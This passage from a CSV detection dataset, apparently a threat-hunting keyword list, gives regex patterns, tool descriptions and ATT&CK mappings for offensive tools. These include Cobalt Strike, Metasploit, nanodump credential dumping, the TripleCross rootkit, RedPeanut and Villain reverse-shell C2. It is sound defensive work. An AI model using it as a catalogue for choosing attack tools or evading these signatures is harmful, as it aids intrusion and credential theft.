TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*--socks5-proxyu socks5*",".{0,1000}\-\-socks5\-proxyu\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*socky whoami*",".{0,1000}socky\swhoami.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","95","16","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*sokaRepo/CoercedPotatoRDLL*",".{0,1000}sokaRepo\/CoercedPotatoRDLL.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*Soledge/BlockEtw*",".{0,1000}Soledge\/BlockEtw.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*something.wattahog.org*",".{0,1000}something\.wattahog\.org.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*souravbaghz/RadareEye*",".{0,1000}souravbaghz\/RadareEye.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","1","N/A","N/A","4","351","52","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "*source/avetsvc.c*",".{0,1000}source\/avetsvc\.c.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*source/byakugan*",".{0,1000}source\/byakugan.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/dllinject*",".{0,1000}source\/dllinject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/flash_exploiter*",".{0,1000}source\/flash_exploiter.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/javapayload*",".{0,1000}source\/javapayload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/psh_exe*",".{0,1000}source\/psh_exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*source/shtinkering.*",".{0,1000}source\/shtinkering\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*Source\wdextract\*",".{0,1000}Source\\wdextract\\.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Source\wdextract\zlib\dll_x64\zlibwapi.dll*",".{0,1000}Source\\wdextract\\zlib\\dll_x64\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Source\wdextract\zlib\dll_x86\zlibwapi.dll*",".{0,1000}Source\\wdextract\\zlib\\dll_x86\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Source\wdextract\zlib\lib\zlibwapi32.lib*",".{0,1000}Source\\wdextract\\zlib\\lib\\zlibwapi32\.lib.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Source\wdextract\zlib\lib\zlibwapi64.lib*",".{0,1000}Source\\wdextract\\zlib\\lib\\zlibwapi64\.lib.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*SourcePoint*Loader.go*",".{0,1000}SourcePoint.{0,1000}Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*source-teamserver.sh*",".{0,1000}source\-teamserver\.sh.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*spacerunner.exe -i *.ps1* -o *.exe*",".{0,1000}spacerunner\.exe\s\-i\s.{0,1000}\.ps1.{0,1000}\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*SpaceRunner-master.zip*",".{0,1000}SpaceRunner\-master\.zip.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*spaceshuttle.io.all@gmail.com*",".{0,1000}spaceshuttle\.io\.all\@gmail\.com.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*SpamChannel-main.zip*",".{0,1000}SpamChannel\-main\.zip.{0,1000}","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","4","305","30","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" "*Spartacus.exe --mode proxy*",".{0,1000}Spartacus\.exe\s\-\-mode\sproxy.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*Spartacus-main.zip*",".{0,1000}Spartacus\-main\.zip.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*spartacus-proxy-*.log*",".{0,1000}spartacus\-proxy\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*Spartacus-v2.*-x64.zip*",".{0,1000}Spartacus\-v2\..{0,1000}\-x64\.zip.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*spartan-conseil/ratchatpt*",".{0,1000}spartan\-conseil\/ratchatpt.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*spartan-conseil/ratchatpt*",".{0,1000}spartan\-conseil\/ratchatpt.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*Spawn a phantom shell - with pattern-based trigger*",".{0,1000}Spawn\sa\sphantom\sshell\s\-\swith\spattern\-based\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Spawn CoercedPotato as a Reflective DLL*",".{0,1000}Spawn\sCoercedPotato\sas\sa\sReflective\sDLL.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*Spawn encrypted pseudo-shell with IP - with *",".{0,1000}Spawn\sencrypted\spseudo\-shell\swith\sIP\s\-\swith\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Spawn plaintext pseudo-shell with IP - using *",".{0,1000}Spawn\splaintext\spseudo\-shell\swith\sIP\s\-\susing\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*spawn/runshellcode*",".{0,1000}spawn\/runshellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*spawn_cmd.dll*",".{0,1000}spawn_cmd\.dll.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 /SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","243","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" "*spawnas * \ HACKER https*",".{0,1000}spawnas\s.{0,1000}\s\\\sHACKER\shttps.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SpawnAsAgentManager.cs*",".{0,1000}SpawnAsAgentManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*spawnasshellcode*",".{0,1000}spawnasshellcode.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawnAsShellcodeManager*",".{0,1000}SpawnAsShellcodeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawneRv6yTYhShell*",".{0,1000}SpawneRv6yTYhShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*SpawnPPIDAgentManager*",".{0,1000}SpawnPPIDAgentManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawnShellcode.cs*",".{0,1000}SpawnShellcode\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawnShellcodeManager*",".{0,1000}SpawnShellcodeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*spawnT2W(*",".{0,1000}spawnT2W\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*SpawnTheThing(*",".{0,1000}SpawnTheThing\(.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*spawnto *.exe",".{0,1000}spawnto\s.{0,1000}\.exe","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*spawnto */path *",".{0,1000}spawnto\s.{0,1000}\/path\s.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*spawnto_x64 -Application *",".{0,1000}spawnto_x64\s\-Application\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 